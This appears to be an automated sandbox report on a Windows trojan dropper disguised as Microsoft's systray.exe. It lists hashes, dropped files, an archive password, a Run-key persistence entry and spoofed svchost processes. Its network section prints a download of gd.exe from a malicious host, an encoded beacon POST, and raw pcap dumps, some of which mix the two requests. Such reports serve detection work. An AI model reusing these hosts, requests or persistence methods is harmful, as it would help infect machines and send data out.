Analysis Date2013-08-19 20:42:44
MD5478a048b7df91df76f3cde8b23ccd4e1
SHA1901b0270875890e4a1b2a994e50697f11587183c

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 7e9e633fd2aedade49bf819fab33d557 sha1: 33a7369a092668a248ff9172c9eb9a5443aa789a size: 23552
Section.rdata md5: db16645055619c0cc73276ff5c3adb75 sha1: dc47890e999d881a550428f04282c5d35f6928d9 size: 4608
Section.data md5: a59d6ff4f72ca84cc2dea3b332090bfb sha1: 11c21bb8db10d1fbb89fbf046a321f712a681c99 size: 1024
Section.ndata md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section.rsrc md5: 6e2c273b4313466fc08ffccabc4ee91a sha1: 50763507fa8d2d645b2b667fb4a14e85fb1eaac7 size: 3072
Timestamp2009-02-21 19:46:34
VersionLegalCopyright: © Microsoft Corporation. All rights reserved.
InternalName: systray
FileVersion: 5.1.2600.0 (xpclient.010817-1148)
CompanyName: Microsoft Corporation
ProductName: Microsoft® Windows® Operating System
ProductVersion: 5.1.2600.0
FileDescription: Systray .exe stub
OriginalFilename: systray.exe
PackerNullsoft PiMP Stub -> SFX
PEhash44322c81e8779ee84080db5df97c17280ee6f92e

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\svchost.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\nsf2.tmp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\nsg3.tmp\ExecDos.dll
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\a1.7z
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\7za.exe
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\nsi1.tmp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\nsg3.tmp
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\ic1.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\EuroP.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\7za.exe x C:\Documents and Settings\Administrator\Local Settings\Temp\a1.7z -aoa -oC:\Documents and Settings\Administrator\Local Settings\Temp -plolmilf
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\svchost.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\E4U.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\_tbp.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\SLFAT.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\Gi.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\7za.exe x C:\Documents and Settings\Administrator\Local Settings\Temp\a1.7z -aoa -oC:\Documents and Settings\Administrator\Local Settings\Temp -plolmilf

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\ic1.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\_tbp.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\E4U.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\SLFAT.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Gi.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\EuroP.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\svchost.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\SLFAT.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\nss5.tmp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\a1.7z
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\7za.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\Done.exe
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\nsm4.tmp

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\EuroP.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\\x03\1806 ➝
NULL
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\RFC1156Agent\CurrentVersion\Parameters\TrapPollTimeMilliSecs ➝
15000
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Ogf..bat
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\E4U.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\ic1.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\C.tmp
Creates MutexDBWinMutex

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\_tbp.exe

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Qvunovisidub\Aweziwoji ➝
NULL
Creates FileWMIDataDevice
Creates FileC:\WINDOWS\anefcr.dll
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates Processrundll32.exe "C:\WINDOWS\anefcr.dll",Startup
Creates Mutexffdf3db6

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\Gi.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\~DF2D84.tmp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock URLhttp://2b.perfectexe.com:88/gd.exe?t=0.6909019

Process
↳ C:\Documents and Settings\Administrator\Application Data\Done.exe

RegistryHKEY_CURRENT_USER\Software\Temp\7\7 ➝
http://www.flvtube.net/12224\\x00
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WinInstall.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\nsf7.tmp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\nsl8.tmp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\nst6.tmp
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\WinInstall.exe

Process
↳ C:\WINDOWS\Explorer.EXE

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories\{00021494-0000-0000-C000-000000000046}\Enum\Implementing ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\NetCache\AdminPinStartTime ➝
NULL
RegistryHKEY_CURRENT_USER\SessionInformation\ProgramCount ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\TrayNotify\PastIconsStream ➝
NULL
Creates ProcessC:\WINDOWS\system32\svchost.exe
Creates MutexHardError_C000026B
Creates Mutex5f78ea9a
Creates MutexShell.CMruPidlList

Process
↳ rundll32.exe "C:\WINDOWS\anefcr.dll",Startup

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Qvunovisidub\Fyajow ➝
173\\x00
RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ybikiliyo ➝
rundll32.exe "C:\WINDOWS\anefcr.dll",Startup\\x00
Creates Processrundll32.exe "C:\WINDOWS\anefcr.dll",iep
Creates Mutexadce4bd2

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\WinInstall.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates Process"C:\Documents and Settings\Administrator\Local Settings\Temp\willwnd.exe"

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ rundll32.exe "C:\WINDOWS\anefcr.dll",iep

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Qvunovisidub\Xyaqalajunazilek ➝
NULL

Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\willwnd.exe"

Network Details:

DNSconduit.com
Type: A
94.127.79.125
DNSmail.ru
Type: A
94.100.180.199
DNSmail.ru
Type: A
94.100.180.201
DNSmail.ru
Type: A
217.69.139.199
DNSmail.ru
Type: A
217.69.139.201
DNSmeelith.com
Type: A
208.91.198.98
DNS0000110859.fc75adbd.01.48E22BE9C2CB4BA89110B3F56B8746C9.n.empty.1147.empty.5_1._t_i.ffffffff.empty.173.rc2.a4h9uploading.com
Type: A
50.116.35.251
DNS2b.perfectexe.com
Type: A
190.93.253.20
DNS2b.perfectexe.com
Type: A
190.93.252.20
DNSmegadataonline.net
Type: A
DNSbubblefeed.net
Type: A
HTTP POSThttp://meelith.com/comprende.php?ini=v22MyTS3QIzyWmc0vlEVEOdtY7/pJNU4OIAMTHcieRsPDALVjBqMmj2uU1rHIQqMgMqV7ZlDeAiBMF4YGmLzbY+RtufQpaX/Nftqv+7rnQ==
User-Agent: Mozilla/6.0 (Windows; wget 3.0)
HTTP GEThttp://2b.perfectexe.com:88/gd.exe?t=0.6909019
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2900.5512; Windows NT 5.1.2600)
HTTP GEThttp://2b.perfectexe.com:88/gd.exe?t=0.6909019
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2900.5512; Windows NT 5.1.2600)
HTTP GEThttp://2b.perfectexe.com:88/gd.exe?t=0.6909019
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2900.5512; Windows NT 5.1.2600)
Flows TCP192.168.1.1:1032 ➝ 208.91.198.98:80
Flows TCP192.168.1.1:1033 ➝ 190.93.253.20:88
Flows TCP192.168.1.1:1034 ➝ 190.93.253.20:88
Flows TCP192.168.1.1:1035 ➝ 190.93.253.20:88

Raw Pcap
0x00000000 (00000)   504f5354 202f636f 6d707265 6e64652e   POST /comprende.
0x00000010 (00016)   7068703f 696e693d 7632324d 79545333   php?ini=v22MyTS3
0x00000020 (00032)   51497a79 576d6330 766c4556 454f6474   QIzyWmc0vlEVEOdt
0x00000030 (00048)   59372f70 4a4e5534 4f49414d 54486369   Y7/pJNU4OIAMTHci
0x00000040 (00064)   65527350 44414c56 6a42714d 6d6a3275   eRsPDALVjBqMmj2u
0x00000050 (00080)   55317248 4951714d 674d7156 375a6c44   U1rHIQqMgMqV7ZlD
0x00000060 (00096)   65416942 4d463459 476d4c7a 62592b52   eAiBMF4YGmLzbY+R
0x00000070 (00112)   74756651 7061582f 4e667471 762b3772   tufQpaX/Nftqv+7r
0x00000080 (00128)   6e513d3d 20485454 502f312e 310d0a43   nQ== HTTP/1.1..C
0x00000090 (00144)   6f6e7465 6e742d54 7970653a 20617070   ontent-Type: app
0x000000a0 (00160)   6c696361 74696f6e 2f782d77 77772d66   lication/x-www-f
0x000000b0 (00176)   6f726d2d 75726c65 6e636f64 65640d0a   orm-urlencoded..
0x000000c0 (00192)   486f7374 3a206d65 656c6974 682e636f   Host: meelith.co
0x000000d0 (00208)   6d0d0a55 7365722d 4167656e 743a204d   m..User-Agent: M
0x000000e0 (00224)   6f7a696c 6c612f36 2e302028 57696e64   ozilla/6.0 (Wind
0x000000f0 (00240)   6f77733b 20776765 7420332e 30290d0a   ows; wget 3.0)..
0x00000100 (00256)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000110 (00272)   3139330d 0a436f6e 6e656374 696f6e3a   193..Connection:
0x00000120 (00288)   20636c6f 73650d0a 43616368 652d436f    close..Cache-Co
0x00000130 (00304)   6e74726f 6c3a206e 6f2d6361 6368650d   ntrol: no-cache.
0x00000140 (00320)   0a0d0a64 6174613d 71537254 7a474c30   ...data=qSrTzGL0
0x00000150 (00336)   524d4379 446e5939 2b784a45 5165356e   RMCyDnY9+xJEQe5n
0x00000160 (00352)   4e4c756e 64734d71 66646742 477a556f   NLundsMqfdgBGzUo
0x00000170 (00368)   4a307856 54552f44 7a515743 33444c62   J0xVTU/DzQWC3DLb
0x00000180 (00384)   58422f55 66455454 316f3646 325a4962   XB/UfETT1o6F2ZIb
0x00000190 (00400)   4c454756 4a304d4f 4a545344 50395058   LEGVJ0MOJTSDP9PX
0x000001a0 (00416)   34615353 2f4f6167 59363134 33624770   4aSS/OagY6143bGp
0x000001b0 (00432)   30792f75 4756534c 564c3075 2b756f2b   0y/uGVSLVL0u+uo+
0x000001c0 (00448)   78354e72 61714937 444a614b 47673754   x5NraqI7DJaKGg7T
0x000001d0 (00464)   4371586b 54737a47 496e5542 78694b31   CqXkTszGInUBxiK1
0x000001e0 (00480)   2f684b4c 326f4659 706a7353 65593034   /hKL2oFYpjsSeY04
0x000001f0 (00496)   782b7a74 32613964 4f2b5549 35566850   x+zt2a9dO+UI5VhP
0x00000200 (00512)   30573435                              0W45

0x00000000 (00000)   47455420 2f67642e 6578653f 743d302e   GET /gd.exe?t=0.
0x00000010 (00016)   36393039 30313920 48545450 2f312e31   6909019 HTTP/1.1
0x00000020 (00032)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000030 (00048)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x00000040 (00064)   7469626c 653b204d 53494520 362e302e   tible; MSIE 6.0.
0x00000050 (00080)   32393030 2e353531 323b2057 696e646f   2900.5512; Windo
0x00000060 (00096)   7773204e 5420352e 312e3236 3030290d   ws NT 5.1.2600).
0x00000070 (00112)   0a486f73 743a2032 622e7065 72666563   .Host: 2b.perfec
0x00000080 (00128)   74657865 2e636f6d 3a38380d 0a0d0a43   texe.com:88....C
0x00000090 (00144)   6f6e7465 6e742d54 7970653a 20617070   ontent-Type: app
0x000000a0 (00160)   6c696361 74696f6e 2f782d77 77772d66   lication/x-www-f
0x000000b0 (00176)   6f726d2d 75726c65 6e636f64 65640d0a   orm-urlencoded..
0x000000c0 (00192)   486f7374 3a206d65 656c6974 682e636f   Host: meelith.co
0x000000d0 (00208)   6d0d0a55 7365722d 4167656e 743a204d   m..User-Agent: M
0x000000e0 (00224)   6f7a696c 6c612f36 2e302028 57696e64   ozilla/6.0 (Wind
0x000000f0 (00240)   6f77733b 20776765 7420332e 30290d0a   ows; wget 3.0)..
0x00000100 (00256)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000110 (00272)   3139330d 0a436f6e 6e656374 696f6e3a   193..Connection:
0x00000120 (00288)   20636c6f 73650d0a 43616368 652d436f    close..Cache-Co
0x00000130 (00304)   6e74726f 6c3a206e 6f2d6361 6368650d   ntrol: no-cache.
0x00000140 (00320)   0a0d0a64 6174613d 71537254 7a474c30   ...data=qSrTzGL0
0x00000150 (00336)   524d4379 446e5939 2b784a45 5165356e   RMCyDnY9+xJEQe5n
0x00000160 (00352)   4e4c756e 64734d71 66646742 477a556f   NLundsMqfdgBGzUo
0x00000170 (00368)   4a307856 54552f44 7a515743 33444c62   J0xVTU/DzQWC3DLb
0x00000180 (00384)   58422f55 66455454 316f3646 325a4962   XB/UfETT1o6F2ZIb
0x00000190 (00400)   4c454756 4a304d4f 4a545344 50395058   LEGVJ0MOJTSDP9PX
0x000001a0 (00416)   34615353 2f4f6167 59363134 33624770   4aSS/OagY6143bGp
0x000001b0 (00432)   30792f75 4756534c 564c3075 2b756f2b   0y/uGVSLVL0u+uo+
0x000001c0 (00448)   78354e72 61714937 444a614b 47673754   x5NraqI7DJaKGg7T
0x000001d0 (00464)   4371586b 54737a47 496e5542 78694b31   CqXkTszGInUBxiK1
0x000001e0 (00480)   2f684b4c 326f4659 706a7353 65593034   /hKL2oFYpjsSeY04
0x000001f0 (00496)   782b7a74 32613964 4f2b5549 35566850   x+zt2a9dO+UI5VhP
0x00000200 (00512)   30573435                              0W45

0x00000000 (00000)   47455420 2f67642e 6578653f 743d302e   GET /gd.exe?t=0.
0x00000010 (00016)   36393039 30313920 48545450 2f312e31   6909019 HTTP/1.1
0x00000020 (00032)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000030 (00048)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x00000040 (00064)   7469626c 653b204d 53494520 362e302e   tible; MSIE 6.0.
0x00000050 (00080)   32393030 2e353531 323b2057 696e646f   2900.5512; Windo
0x00000060 (00096)   7773204e 5420352e 312e3236 3030290d   ws NT 5.1.2600).
0x00000070 (00112)   0a486f73 743a2032 622e7065 72666563   .Host: 2b.perfec
0x00000080 (00128)   74657865 2e636f6d 3a38380d 0a0d0a43   texe.com:88....C
0x00000090 (00144)   6f6e7465 6e742d54 7970653a 20617070   ontent-Type: app
0x000000a0 (00160)   6c696361 74696f6e 2f782d77 77772d66   lication/x-www-f
0x000000b0 (00176)   6f726d2d 75726c65 6e636f64 65640d0a   orm-urlencoded..
0x000000c0 (00192)   486f7374 3a206d65 656c6974 682e636f   Host: meelith.co
0x000000d0 (00208)   6d0d0a55 7365722d 4167656e 743a204d   m..User-Agent: M
0x000000e0 (00224)   6f7a696c 6c612f36 2e302028 57696e64   ozilla/6.0 (Wind
0x000000f0 (00240)   6f77733b 20776765 7420332e 30290d0a   ows; wget 3.0)..
0x00000100 (00256)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000110 (00272)   3139330d 0a436f6e 6e656374 696f6e3a   193..Connection:
0x00000120 (00288)   20636c6f 73650d0a 43616368 652d436f    close..Cache-Co
0x00000130 (00304)   6e74726f 6c3a206e 6f2d6361 6368650d   ntrol: no-cache.
0x00000140 (00320)   0a0d0a64 6174613d 71537254 7a474c30   ...data=qSrTzGL0
0x00000150 (00336)   524d4379 446e5939 2b784a45 5165356e   RMCyDnY9+xJEQe5n
0x00000160 (00352)   4e4c756e 64734d71 66646742 477a556f   NLundsMqfdgBGzUo
0x00000170 (00368)   4a307856 54552f44 7a515743 33444c62   J0xVTU/DzQWC3DLb
0x00000180 (00384)   58422f55 66455454 316f3646 325a4962   XB/UfETT1o6F2ZIb
0x00000190 (00400)   4c454756 4a304d4f 4a545344 50395058   LEGVJ0MOJTSDP9PX
0x000001a0 (00416)   34615353 2f4f6167 59363134 33624770   4aSS/OagY6143bGp
0x000001b0 (00432)   30792f75 4756534c 564c3075 2b756f2b   0y/uGVSLVL0u+uo+
0x000001c0 (00448)   78354e72 61714937 444a614b 47673754   x5NraqI7DJaKGg7T
0x000001d0 (00464)   4371586b 54737a47 496e5542 78694b31   CqXkTszGInUBxiK1
0x000001e0 (00480)   2f684b4c 326f4659 706a7353 65593034   /hKL2oFYpjsSeY04
0x000001f0 (00496)   782b7a74 32613964 4f2b5549 35566850   x+zt2a9dO+UI5VhP
0x00000200 (00512)   30573435                              0W45

0x00000000 (00000)   47455420 2f67642e 6578653f 743d302e   GET /gd.exe?t=0.
0x00000010 (00016)   36393039 30313920 48545450 2f312e31   6909019 HTTP/1.1
0x00000020 (00032)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000030 (00048)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x00000040 (00064)   7469626c 653b204d 53494520 362e302e   tible; MSIE 6.0.
0x00000050 (00080)   32393030 2e353531 323b2057 696e646f   2900.5512; Windo
0x00000060 (00096)   7773204e 5420352e 312e3236 3030290d   ws NT 5.1.2600).
0x00000070 (00112)   0a486f73 743a2032 622e7065 72666563   .Host: 2b.perfec
0x00000080 (00128)   74657865 2e636f6d 3a38380d 0a0d0a43   texe.com:88....C
0x00000090 (00144)   6f6e7465 6e742d54 7970653a 20617070   ontent-Type: app
0x000000a0 (00160)   6c696361 74696f6e 2f782d77 77772d66   lication/x-www-f
0x000000b0 (00176)   6f726d2d 75726c65 6e636f64 65640d0a   orm-urlencoded..
0x000000c0 (00192)   486f7374 3a206d65 656c6974 682e636f   Host: meelith.co
0x000000d0 (00208)   6d0d0a55 7365722d 4167656e 743a204d   m..User-Agent: M
0x000000e0 (00224)   6f7a696c 6c612f36 2e302028 57696e64   ozilla/6.0 (Wind
0x000000f0 (00240)   6f77733b 20776765 7420332e 30290d0a   ows; wget 3.0)..
0x00000100 (00256)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000110 (00272)   3139330d 0a436f6e 6e656374 696f6e3a   193..Connection:
0x00000120 (00288)   20636c6f 73650d0a 43616368 652d436f    close..Cache-Co
0x00000130 (00304)   6e74726f 6c3a206e 6f2d6361 6368650d   ntrol: no-cache.
0x00000140 (00320)   0a0d0a64 6174613d 71537254 7a474c30   ...data=qSrTzGL0
0x00000150 (00336)   524d4379 446e5939 2b784a45 5165356e   RMCyDnY9+xJEQe5n
0x00000160 (00352)   4e4c756e 64734d71 66646742 477a556f   NLundsMqfdgBGzUo
0x00000170 (00368)   4a307856 54552f44 7a515743 33444c62   J0xVTU/DzQWC3DLb
0x00000180 (00384)   58422f55 66455454 316f3646 325a4962   XB/UfETT1o6F2ZIb
0x00000190 (00400)   4c454756 4a304d4f 4a545344 50395058   LEGVJ0MOJTSDP9PX
0x000001a0 (00416)   34615353 2f4f6167 59363134 33624770   4aSS/OagY6143bGp
0x000001b0 (00432)   30792f75 4756534c 564c3075 2b756f2b   0y/uGVSLVL0u+uo+
0x000001c0 (00448)   78354e72 61714937 444a614b 47673754   x5NraqI7DJaKGg7T
0x000001d0 (00464)   4371586b 54737a47 496e5542 78694b31   CqXkTszGInUBxiK1
0x000001e0 (00480)   2f684b4c 326f4659 706a7353 65593034   /hKL2oFYpjsSeY04
0x000001f0 (00496)   782b7a74 32613964 4f2b5549 35566850   x+zt2a9dO+UI5VhP
0x00000200 (00512)   30573435                              0W45


Strings